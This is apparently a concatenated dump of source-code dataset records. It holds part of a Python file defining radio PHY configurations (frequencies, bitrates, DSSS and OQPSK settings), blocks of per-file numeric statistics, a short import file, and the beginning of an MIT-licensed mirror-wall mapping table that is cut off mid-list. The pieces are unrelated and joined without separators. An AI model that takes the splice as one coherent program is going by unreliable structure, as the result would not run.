phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 200000
phy.profile_inputs.base_frequency_hz.value = long(863000000)
phy.profile_inputs.bitrate.value = 100000
phy.profile_inputs.deviation.value = 50000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_169MHz_2GFSK_4p8kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Europe 169', readable_name="Connect 169MHz 2GFSK 4.8kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.base_frequency_hz.value = long(169000000)
phy.profile_inputs.bitrate.value = 4800
phy.profile_inputs.deviation.value = 1200
phy.profile_inputs.channel_spacing_hz.value = 12500
phy.profile_inputs.number_of_timing_windows.value = 2
phy.profile_inputs.rx_xtal_error_ppm.value = 7
phy.profile_inputs.symbols_in_timing_window.value = 6
phy.profile_inputs.timing_detection_threshold.value = 10
phy.profile_inputs.tx_xtal_error_ppm.value = 7
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_490MHz_2GFSK_10kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='China 490', readable_name="Connect 490MHz 2GFSK 10kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.base_frequency_hz.value = long(490000000)
phy.profile_inputs.bitrate.value = 10000
phy.profile_inputs.deviation.value = 25000
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_ALWAYS_ON
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
return phy
def PHY_Connect_920MHz_2GFSK_100kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Japan 915', readable_name="Connect 920MHz 2GFSK 100kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 198000
phy.profile_inputs.base_frequency_hz.value = long(920000000)
phy.profile_inputs.bitrate.value = 100000
phy.profile_inputs.deviation.value = 50000
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_424MHz_2GFSK_4p8kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Korea 424', readable_name="Connect 424MHz 2GFSK 4.8kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 12000
phy.profile_inputs.base_frequency_hz.value = long(424700000)
phy.profile_inputs.bitrate.value = 4800
phy.profile_inputs.deviation.value = 2400
phy.profile_inputs.channel_spacing_hz.value = 12500
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.freq_offset_hz.value = 1450
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
return phy
def PHY_Connect_447MHz_2GFSK_4p8kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Korea 447', readable_name="Connect 447MHz 2GFSK 4.8kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.bandwidth_hz.value = 12000
phy.profile_inputs.base_frequency_hz.value = long(447000000)
phy.profile_inputs.bitrate.value = 4800
phy.profile_inputs.deviation.value = 2400
phy.profile_inputs.channel_spacing_hz.value = 12500
phy.profile_inputs.rx_xtal_error_ppm.value = 20
phy.profile_inputs.symbols_in_timing_window.value = 14
phy.profile_inputs.tx_xtal_error_ppm.value = 20
phy.profile_inputs.freq_offset_hz.value = 1450
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
return phy
def PHY_Connect_917MHz_2GFSK_4p8kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='Korea 915', readable_name="Connect 917MHz 2GFSK 4.8kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_period.value = 0
phy.profile_inputs.base_frequency_hz.value = long(917100000)
phy.profile_inputs.bitrate.value = 4800
phy.profile_inputs.deviation.value = 2400
phy.profile_inputs.channel_spacing_hz.value = 200000
phy.profile_inputs.number_of_timing_windows.value = 10
phy.profile_inputs.rx_xtal_error_ppm.value = 2
phy.profile_inputs.symbols_in_timing_window.value = 1
phy.profile_inputs.tx_xtal_error_ppm.value = 3
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.NONE
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
return phy
def PHY_Connect_915MHz_OQPSK_500kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='DSSS 500', readable_name="Connect 915MHz OQPSK 500Kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.deviation.value = 250000
phy.profile_inputs.base_frequency_hz.value = 915000000
phy.profile_inputs.bitrate.value = 500000
phy.profile_inputs.dsss_chipping_code.value = 31433
phy.profile_inputs.dsss_len.value = 16
phy.profile_inputs.dsss_spreading_factor.value = 4
phy.profile_inputs.preamble_length.value = 40
phy.profile_inputs.syncword_tx_skip.value = False
phy.profile_inputs.asynchronous_rx_enable.value = False
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.INTERNAL_LOCK_AT_PREAMBLE_DETECT
phy.profile_inputs.channel_spacing_hz.value = 400000
phy.profile_inputs.test_ber.value = False
phy.profile_inputs.fec_en.value = model.vars.fec_en.var_enum.NONE
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
return phy
def PHY_Connect_915mhz_oqpsk_800kcps_100kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='DSSS 100', readable_name="Connect 915MHz OQPSK 800kcps 100kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.agc_hysteresis.value = 0
phy.profile_inputs.agc_power_target.value = -6
phy.profile_inputs.agc_settling_delay.value = 40
phy.profile_inputs.base_frequency_hz.value = long(902000000)
phy.profile_inputs.baudrate_tol_ppm.value = 4000
phy.profile_inputs.bitrate.value = 100000
phy.profile_inputs.channel_spacing_hz.value = 2000000
phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.LSB_FIRST
phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.LSB_FIRST
phy.profile_inputs.deviation.value = 200000
phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
phy.profile_inputs.dsss_chipping_code.value = long(1951056795)
phy.profile_inputs.dsss_len.value = 32
phy.profile_inputs.dsss_spreading_factor.value = 8
phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
if model.part_family.lower() in ['dumbo', 'jumbo', 'nerio', 'nixi']:
# Series 1
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2520KHz
else:
# Series 2
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2500KHz
phy.profile_inputs.preamble_length.value = 32
phy.profile_inputs.preamble_pattern.value = 0
phy.profile_inputs.preamble_pattern_len.value = 4
phy.profile_inputs.rssi_period.value = 8
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.NONE
phy.profile_inputs.shaping_filter_param.value = 0.5
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
phy.profile_inputs.syncword_0.value = long(167)
phy.profile_inputs.syncword_1.value = long(0)
phy.profile_inputs.syncword_length.value = 8
phy.profile_inputs.timing_detection_threshold.value = 65
phy.profile_inputs.timing_sample_threshold.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.NONE
phy.profile_inputs.xtal_frequency_hz.value = 38400000
return phy
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# def debug_PHY_Connect_IEEE802154_2p4GHz_coh(self, model):
# phy = self._makePhy(model, model.profiles.Base, readable_name='test phy for porting coh demod from ieee to connect', phy_name=phy_name)
#
# # Stuff from connect_base routine.
# phy.profile_inputs.baudrate_tol_ppm.value = 0
# phy.profile_inputs.dsss_chipping_code.value = long(0)
# phy.profile_inputs.dsss_len.value = 0
# phy.profile_inputs.dsss_spreading_factor.value = 0
# phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
# #phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.FSK2
# phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
# phy.profile_inputs.shaping_filter_param.value = 0.5
# phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.NRZ
# phy.profile_inputs.xtal_frequency_hz.value = 38400000
# phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
# phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.MSB_FIRST
# phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.MSB_FIRST
# phy.profile_inputs.preamble_pattern_len.value = 2
# phy.profile_inputs.preamble_length.value = 32
# phy.profile_inputs.preamble_pattern.value = 1
# phy.profile_inputs.syncword_0.value = long(11732)
# phy.profile_inputs.syncword_1.value = long(0)
# phy.profile_inputs.syncword_length.value = 16
# phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.PN9
#
# # Stuff from original Connect phy
# phy.profile_inputs.agc_hysteresis.value = 0
# phy.profile_inputs.agc_power_target.value = -6
# phy.profile_inputs.agc_settling_delay.value = 40
# phy.profile_inputs.base_frequency_hz.value = long(902000000)
# phy.profile_inputs.baudrate_tol_ppm.value = 4000
# phy.profile_inputs.bitrate.value = 100000
# phy.profile_inputs.channel_spacing_hz.value = 2000000
# #phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.LSB_FIRST
# #phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.LSB_FIRST
# phy.profile_inputs.deviation.value = 200000
# phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
# phy.profile_inputs.dsss_chipping_code.value = long(1951056795)
# phy.profile_inputs.dsss_len.value = 32
# phy.profile_inputs.dsss_spreading_factor.value = 8
# phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
# phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
# phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
# phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2520KHz
# phy.profile_inputs.preamble_length.value = 32
# phy.profile_inputs.preamble_pattern.value = 0
# phy.profile_inputs.preamble_pattern_len.value = 4
# phy.profile_inputs.rssi_period.value = 8
# phy.profile_inputs.rx_xtal_error_ppm.value = 0
# phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.NONE
# phy.profile_inputs.shaping_filter_param.value = 0.5
# phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
# phy.profile_inputs.syncword_0.value = long(167)
# phy.profile_inputs.syncword_1.value = long(0)
# phy.profile_inputs.syncword_length.value = 8
# phy.profile_inputs.timing_detection_threshold.value = 65
# phy.profile_inputs.timing_sample_threshold.value = 0
# phy.profile_inputs.tx_xtal_error_ppm.value = 0
# phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.NONE
# phy.profile_inputs.xtal_frequency_hz.value = 38400000
#
# # the rest of the stuff from the ieee phy...
# phy.profile_inputs.agc_power_target.value = -11
# phy.profile_inputs.agc_scheme.value = model.vars.agc_scheme.var_enum.SCHEME_3
# phy.profile_inputs.agc_settling_delay.value = 40
# phy.profile_inputs.bandwidth_hz.value = 2524800
# phy.profile_inputs.baudrate_tol_ppm.value = 0
# phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.DISABLED
# phy.profile_inputs.number_of_timing_windows.value = 7
# phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Custom_OQPSK
# phy.profile_inputs.symbols_in_timing_window.value = 12
# phy.profile_inputs.timing_detection_threshold.value = 65
#
# phy.profile_outputs.AGC_CTRL2_ADCRSTSTARTUP.override = 0
# phy.profile_outputs.AGC_CTRL2_FASTLOOPDEL.override = 5
# phy.profile_outputs.AGC_GAINSTEPLIM_CFLOOPSTEPMAX.override = 4
# phy.profile_outputs.AGC_GAINSTEPLIM_SLOWDECAYCNT.override = 0
# phy.profile_outputs.AGC_LOOPDEL_IFPGADEL.override = 7
# phy.profile_outputs.AGC_LOOPDEL_LNASLICESDEL.override = 7
# phy.profile_outputs.AGC_LOOPDEL_PKDWAIT.override = 15
# #phy.profile_outputs.AGC_MANGAIN_MANGAINLNAATTEN.override = 0
# phy.profile_outputs.AGC_RSSISTEPTHR_DEMODRESTARTPER.override = 5
# phy.profile_outputs.AGC_RSSISTEPTHR_DEMODRESTARTTHR.override = 0xab
# phy.profile_outputs.AGC_RSSISTEPTHR_POSSTEPTHR.override = 3
# phy.profile_outputs.MODEM_AFC_AFCRXCLR.override = 1
# phy.profile_outputs.MODEM_AFC_AFCSCALEM.override = 3
# phy.profile_outputs.MODEM_AFCADJLIM_AFCADJLIM.override = 2750
# phy.profile_outputs.MODEM_CTRL1_PHASEDEMOD.override = 3
# phy.profile_outputs.MODEM_CTRL2_DATAFILTER.override = 7
# phy.profile_outputs.MODEM_CTRL3_TSAMPDEL.override = 2
# phy.profile_outputs.MODEM_CTRL5_BBSS.override = 5
# phy.profile_outputs.MODEM_CTRL5_FOEPREAVG.override = 7
# phy.profile_outputs.MODEM_CTRL5_LINCORR.override = 1
# phy.profile_outputs.MODEM_CTRL5_POEPER.override = 1
# phy.profile_outputs.MODEM_CTRL6_ARW.override = 1
# phy.profile_outputs.MODEM_CTRL6_PSTIMABORT0.override = 1
# phy.profile_outputs.MODEM_CTRL6_PSTIMABORT1.override = 1
# phy.profile_outputs.MODEM_CTRL6_PSTIMABORT2.override = 1
# phy.profile_outputs.MODEM_CTRL6_RXBRCALCDIS.override = 1
# phy.profile_outputs.MODEM_CTRL6_TDREW.override = 64
# phy.profile_outputs.MODEM_INTAFC_FOEPREAVG0.override = 1
# phy.profile_outputs.MODEM_INTAFC_FOEPREAVG1.override = 3
# phy.profile_outputs.MODEM_INTAFC_FOEPREAVG2.override = 5
# phy.profile_outputs.MODEM_INTAFC_FOEPREAVG3.override = 5
# phy.profile_outputs.MODEM_TIMING_OFFSUBDEN.override = 5
# phy.profile_outputs.MODEM_TIMING_OFFSUBNUM.override = 12
# phy.profile_outputs.MODEM_TIMING_TIMTHRESH.override = 80
# phy.profile_outputs.MODEM_TIMING_TIMSEQSYNC.override = 1
# phy.profile_outputs.MODEM_PRE_TXBASES.override = 7
#
# # Enables Clock gating to reduce current consumption
# phy.profile_outputs.MODEM_CGCLKSTOP_FORCEOFF.override = 0x1E00 # 9,10,11,12
def PHY_Connect_915mhz_oqpsk_2Mcps_250kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='DSSS 250', readable_name="Connect 915MHz OQPSK 2Mcps 250kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.xtal_frequency_hz.value = 38400000
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.syncword_0.value = long(167)
phy.profile_inputs.syncword_1.value = long(0)
phy.profile_inputs.syncword_tx_skip.value = False
phy.profile_inputs.syncword_length.value = 8
phy.profile_inputs.preamble_pattern_len.value = 4
phy.profile_inputs.preamble_length.value = 32
phy.profile_inputs.preamble_pattern.value = 0
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
phy.profile_inputs.deviation.value = 500000
phy.profile_inputs.channel_spacing_hz.value = 2000000
phy.profile_inputs.bitrate.value = 250000
phy.profile_inputs.baudrate_tol_ppm.value = 4000
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.NONE
phy.profile_inputs.base_frequency_hz.value = long(902000000)
phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
phy.profile_inputs.shaping_filter_param.value = 0.5
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
phy.profile_inputs.dsss_chipping_code.value = long(1951056795)
phy.profile_inputs.dsss_len.value = 32
phy.profile_inputs.dsss_spreading_factor.value = 8
phy.profile_inputs.asynchronous_rx_enable.value = False
phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.LSB_FIRST
phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.LSB_FIRST
phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.NONE
phy.profile_inputs.timing_detection_threshold.value = 65
phy.profile_inputs.timing_sample_threshold.value = 0
if model.part_family.lower() in ['dumbo', 'jumbo', 'nerio', 'nixi']:
# Series 1
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2520KHz
else:
# Series 2
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2500KHz
phy.profile_inputs.agc_power_target.value = -6
phy.profile_inputs.rssi_period.value = 8
phy.profile_inputs.agc_hysteresis.value = 0
phy.profile_inputs.agc_settling_delay.value = 40
return phy
def PHY_Connect_2_4GHz_OQPSK_2Mcps_250kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='2.4GHz OQPSK 2Mcps 250kbps', readable_name="Connect 2.4GHz OQPSK 2Mcps 250kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.base_frequency_hz.value = long(2405000000)
phy.profile_inputs.agc_hysteresis.value = 0
phy.profile_inputs.agc_power_target.value = -6
phy.profile_inputs.agc_settling_delay.value = 40
phy.profile_inputs.asynchronous_rx_enable.value = False
phy.profile_inputs.baudrate_tol_ppm.value = 4000
phy.profile_inputs.bitrate.value = 250000
phy.profile_inputs.channel_spacing_hz.value = 5000000
phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.MSB_FIRST
phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.MSB_FIRST
phy.profile_inputs.deviation.value = 500000
phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
phy.profile_inputs.dsss_chipping_code.value = long(1951056795)
phy.profile_inputs.dsss_len.value = 32
phy.profile_inputs.dsss_spreading_factor.value = 8
phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
if model.part_family.lower() in ['dumbo', 'jumbo', 'nerio', 'nixi']:
# Series 1
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2520KHz
else:
# Series 2
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2500KHz
phy.profile_inputs.preamble_length.value = 32
phy.profile_inputs.preamble_pattern.value = 0
phy.profile_inputs.preamble_pattern_len.value = 4
phy.profile_inputs.rssi_period.value = 8
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Custom_OQPSK
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
phy.profile_inputs.syncword_0.value = long(229)
phy.profile_inputs.syncword_1.value = long(0)
phy.profile_inputs.syncword_length.value = 8
phy.profile_inputs.timing_detection_threshold.value = 65
phy.profile_inputs.timing_resync_period.value = 2
phy.profile_inputs.timing_sample_threshold.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.NONE
phy.profile_inputs.xtal_frequency_hz.value = 38400000
return phy
| 60.052209
| 175
| 0.741423
| 4,135
| 29,906
| 5.019347
| 0.075937
| 0.173452
| 0.249
| 0.040135
| 0.923826
| 0.894483
| 0.864177
| 0.837726
| 0.813394
| 0.807468
| 0
| 0.045634
| 0.172006
| 29,906
| 497
| 176
| 60.173038
| 0.792545
| 0.233298
| 0
| 0.751534
| 0
| 0
| 0.027939
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046012
| false
| 0
| 0.009202
| 0
| 0.101227
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7abe7c9b0710d1d6926eba795886e6c41a86598b
| 120
|
py
|
Python
|
colosseum/mdps/custom/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/custom/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/custom/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
from colosseum.mdps.custom.continuous import CustomContinuous
from colosseum.mdps.custom.episodic import CustomEpisodic
| 40
| 61
| 0.883333
| 14
| 120
| 7.571429
| 0.642857
| 0.245283
| 0.320755
| 0.433962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 120
| 2
| 62
| 60
| 0.946429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8f86b9cdca4c7617d3bfb06d73539d3a507ac2e7
| 16,672
|
py
|
Python
|
mirrormap.py
|
uvoz/mirrorWall
|
8dbcbd5b7f47ec9e7e4f6c61422feb8b8e60479a
|
[
"Unlicense"
] | null | null | null |
mirrormap.py
|
uvoz/mirrorWall
|
8dbcbd5b7f47ec9e7e4f6c61422feb8b8e60479a
|
[
"Unlicense"
] | null | null | null |
mirrormap.py
|
uvoz/mirrorWall
|
8dbcbd5b7f47ec9e7e4f6c61422feb8b8e60479a
|
[
"Unlicense"
] | null | null | null |
# https://prusalab.cz/projekty/reflexe/
## This is the source code to control the REFLEXE mirrorwall.
### Author : Bob Heida
### Test and minor changes : MakerMatty (see commit history)
### MIT License
#Copyright (c) 2019 Bob Heida
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
# ROUTER for mirror messages
# 2019 by StrejcekBob (Bob Heida)
# Testing and minor modifications by MakerMatty
# This file contains the Mirror map that enables us to retrieve the hub, bonnet and the i2cports for a given mirror.
# Mirrormapping serves sofware & people that wish to operate mirrors based on their logical ID.
# funtions exposed:
# getMirrorAddress(mirror)
# returns a complete record for a mirror : e.g. {"mirror":0,"mirror_hub":0,"hub":2,"bonnet":1,"UD-port":0,"LR-port":1}
# Sample code:
# import mirrormap as mm
# address=mm.getMirrorAddress(1)
# print(address['bonnet'])
# getMirroHub(mirror) -returns the hub ID the mirror belongs to: e.g. 2
# Sample code:
# import mirrormap as mm
# print(mm.getMirroHub(2))
# would return 3
hubmappings={
"hub1":[
{"mirror_hub":0,"mirror":44,"hub":1,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror_hub":1,"mirror":43,"hub":1,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror_hub":2,"mirror":54,"hub":1,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror_hub":3,"mirror":42,"hub":1,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror_hub":4,"mirror":53,"hub":1,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror_hub":5,"mirror":63,"hub":1,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror_hub":6,"mirror":41,"hub":1,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror_hub":7,"mirror":52,"hub":1,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror_hub":8,"mirror":62,"hub":1,"bonnet":2,"UD-port":8,"LR-port":9},
{"mirror_hub":9,"mirror":71,"hub":1,"bonnet":2,"UD-port":2,"LR-port":3},
{"mirror_hub":10,"mirror":40,"hub":1,"bonnet":1,"UD-port":0,"LR-port":1},
{"mirror_hub":11,"mirror":51,"hub":1,"bonnet":1,"UD-port":2,"LR-port":3},
{"mirror_hub":12,"mirror":61,"hub":1,"bonnet":1,"UD-port":4,"LR-port":5},
{"mirror_hub":13,"mirror":70,"hub":1,"bonnet":2,"UD-port":6,"LR-port":7},
{"mirror_hub":14,"mirror":78,"hub":1,"bonnet":2,"UD-port":0,"LR-port":1}
],
"hub2":[
{"mirror":34,"mirror_hub":0,"hub":2,"bonnet":0,"UD-port":0,"LR-port":1},
{"mirror":24,"mirror_hub":1,"hub":2,"bonnet":0,"UD-port":2,"LR-port":3},
{"mirror":33,"mirror_hub":2,"hub":2,"bonnet":0,"UD-port":6,"LR-port":7},
{"mirror":15,"mirror_hub":3,"hub":2,"bonnet":0,"UD-port":4,"LR-port":5},
{"mirror":23,"mirror_hub":4,"hub":2,"bonnet":0,"UD-port":8,"LR-port":9},
{"mirror":32,"mirror_hub":5,"hub":2,"bonnet":2,"UD-port":4,"LR-port":5},
{"mirror":7,"mirror_hub":6,"hub":2,"bonnet":1,"UD-port":6,"LR-port":7},
{"mirror":14,"mirror_hub":7,"hub":2,"bonnet":1,"UD-port":8,"LR-port":9},
{"mirror":22,"mirror_hub":8,"hub":2,"bonnet":2,"UD-port":8,"LR-port":9},
